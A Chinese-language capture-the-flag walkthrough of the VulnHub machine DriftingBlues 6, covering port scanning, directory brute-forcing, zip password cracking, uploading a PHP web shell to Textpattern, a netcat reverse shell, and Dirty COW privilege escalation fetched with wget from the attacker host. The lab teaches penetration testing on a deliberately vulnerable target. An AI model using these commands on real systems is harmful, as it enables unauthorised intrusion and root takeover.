靶机介绍

下载地址:https://download.vulnhub.com/driftingblues/driftingblues6_vh.ova

难度:Easy

运行环境:VirtualBox


攻击主机:kali 2021

目标主机:DRIFTINGBLUES: 6

打靶开始

1.主机发现

使用ARP扫描可以快速的发现当前网段所有的开启主机

arpscan

2.端口扫描

还是老套路

1
2
3
4
5
6
7
8
9
10
11
nmap -sV -sC -p- 192.168.0.104
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-10 02:06 EDT
Nmap scan report for 192.168.0.104
Host is up (0.0019s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/textpattern/textpattern
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: driftingblues

nmap

3.信息收集

使用浏览器访问目标WEB站点,得到了一串提示

1
2
3
4
User-agent: *
Disallow: /textpattern/textpattern
dont forget to add .zip extension to your dir-brute
;)

访问该路径得到一个登录地址,另一段提示应该是一个zip文件,应该保存了一些密码之类的····

使用dirb工具进行爆破

1
dirb http://192.168.0.104/ /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -X .zip

dirb


再次进行目录爆破,我比较习惯用dirsearch

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(yifang㉿yifang)-[~]
└─$ dirsearch -u http://192.168.0.104/ -i 200
[02:36:29] 200 - 52KB - /db
[02:36:30] 200 - 750B - /index
[02:36:30] 200 - 750B - /index.html
[02:36:33] 200 - 110B - /robots.txt
[02:36:35] 200 - 12KB - /textpattern/
-----------------------------------------------------
┌──(yifang㉿yifang)-[~]
└─$ dirsearch -u http://192.168.0.104/textpattern/textpattern/ -i 200
[02:45:38] 200 - 0B - /textpattern/textpattern/config.php
[02:45:40] 200 - 5KB - /textpattern/textpattern/include/
[02:45:40] 200 - 4KB - /textpattern/textpattern/index.php
[02:45:40] 200 - 4KB - /textpattern/textpattern/index.php/login/
[02:45:41] 200 - 6KB - /textpattern/textpattern/lib/
[02:45:43] 200 - 784B - /textpattern/textpattern/plugins/
[02:45:43] 200 - 2KB - /textpattern/textpattern/publish/
[02:45:44] 200 - 3KB - /textpattern/textpattern/setup/
[02:45:45] 200 - 776B - /textpattern/textpattern/tmp/
[02:45:46] 200 - 2KB - /textpattern/textpattern/vendors/
-----------------------------------------------------
┌──(yifang㉿yifang)-[~]
└─$ dirsearch -u http://192.168.0.104/textpattern/ -i 200
[02:46:59] 200 - 66KB - /textpattern/HISTORY
[02:46:59] 200 - 66KB - /textpattern/HISTORY.txt
[02:46:59] 200 - 15KB - /textpattern/LICENSE.txt
[02:47:00] 200 - 15KB - /textpattern/LICENSE
[02:47:00] 200 - 6KB - /textpattern/README
[02:47:00] 200 - 6KB - /textpattern/README.txt
[02:47:04] 200 - 0B - /textpattern/css.php
[02:47:05] 200 - 944B - /textpattern/files/
[02:47:06] 200 - 746B - /textpattern/images/
[02:47:06] 200 - 12KB - /textpattern/index.php
[02:47:10] 200 - 4KB - /textpattern/textpattern/
[02:47:10] 200 - 746B - /textpattern/themes/

4.离线口令爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(yifang㉿yifang)-[~]
└─$ zip2john spammer.zip > passwd #先生成zip的哈希散列
ver 2.0 spammer.zip/creds.txt PKZIP Encr: cmplen=27, decmplen=15, crc=B003611D
┌──(yifang㉿yifang)-[~]
└─$ john passwd --show #注意这里需要加一个show
spammer.zip/creds.txt:myspace4:creds.txt:spammer.zip::spammer.zip
1 password hash cracked, 0 left
┌──(yifang㉿yifang)-[~]
└─$ unzip spammer.zip #进行zip解压
Archive: spammer.zip
[spammer.zip] creds.txt password:
extracting: creds.txt
┌──(yifang㉿yifang)-[~]
└─$ cat creds.txt
mayer:lionheart
---------------------------------
账户:mayer
密码:lionheart

5.文件上传Getshell

登录后台,进入【Content】->【Files】下,进行文件上传,令人兴奋的是,这里可以上传任何文件,

而路径就在http://192.168.0.104/textpattern/files/shell.php

admin

蚁剑连接成功

antsword

6.后渗透提权

首先进行nc转移shell,目标的nc似乎存在-e的功能

1
2
目标主机:nc -e /bin/shell 192.168.0.103 4444
kali:nc -lvp 4444

nc

在尝试了两种提权方式 sudoers SUID 并没有找到有用的文件,尝试使用 脏牛 进行提权操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
kali
cp /usr/share/exploitdb/exploits/linux/local/40839.c .
python3 -m http.server
-----------------------------------------------
目标主机:
python -c 'import pty; pty.spawn("/bin/bash")'
cd /tmp
wget http://192.168.0.103:8000/40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty

-----------------
重新连接ncshell
python -c 'import pty; pty.spawn("/bin/bash")'
su firefart
id
cat /root/flag.txt

getshell

flag

打靶结束

作者:yifang

XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way